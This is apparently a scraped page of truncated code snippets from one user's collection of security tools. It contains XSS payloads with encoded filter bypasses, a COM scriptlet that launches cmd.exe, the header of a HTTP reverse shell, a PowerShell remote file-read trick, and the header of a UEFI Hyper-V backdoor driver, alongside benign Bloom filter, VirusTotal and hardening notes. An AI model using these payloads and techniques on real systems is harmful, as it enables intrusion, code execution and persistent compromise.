JohnTroony

$CimSession = New-CimSession -ComputerName 10.0.0.2

$FilePath = 'C:\Windows\System32\notepad.exe'

# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)

JohnTroony

/*
 *********************************************************************

  Part of UEFI DXE driver code that injects Hyper-V VM exit handler
  backdoor into the Device Guard enabled Windows 10 Enterprise.
  
  Execution starts from new_ExitBootServices() -- a hook handler 
  for EFI_BOOT_SERVICES.ExitBootServices() which being called by
  winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
  transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)

JohnTroony

#!/usr/bin/python3
#
# Simple Bloom filter implementation in Python 3
# Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
# Licensed under the terms of the MIT license
#
# Written to be used with the Have I been pwned? password list:
#   https://haveibeenpwned.com/passwords
#
# Download the pre-computed filter here (629MB, k=11, false positive p=0.0005):

JohnTroony

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

JohnTroony

<#
    
  Author: Casey Smith @subTee

  License: BSD3-Clause
	
  .SYNOPSIS
  
  Simple Reverse Shell over HTTP. Execute Commands on Client.  
  

JohnTroony

using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;

JohnTroony

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[
	
			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");	

JohnTroony

#
# Upload a sample to VirusTotal and pretty print the report. All in a handy alias.  
#
# Dependecies:
#
#  * python > 2.7
#  * pip install Pygments==1.4
#  * curl
#  * VirusTotal API key
#

JohnTroony

Hardening the USB Armory

As a good crypto nerd, I usually use an entirely encrypted linux FS: / but also /boot using grub LUKS support. It's a good setup but it's not perfect, the BIOS and the bootloader are not protected.

I recently got a USBArmory and I wanted to apply the same (or a better) setup.

I found some useful links but no clear howto. So this is my setup.

JohnTroony

import sys, threading, time
from stem.control import Controller
from stem import SocketError, UnsatisfiableRequest
import stem.process
from stem.util import term
from flask import Flask

import socks

WEB_PORT = 8080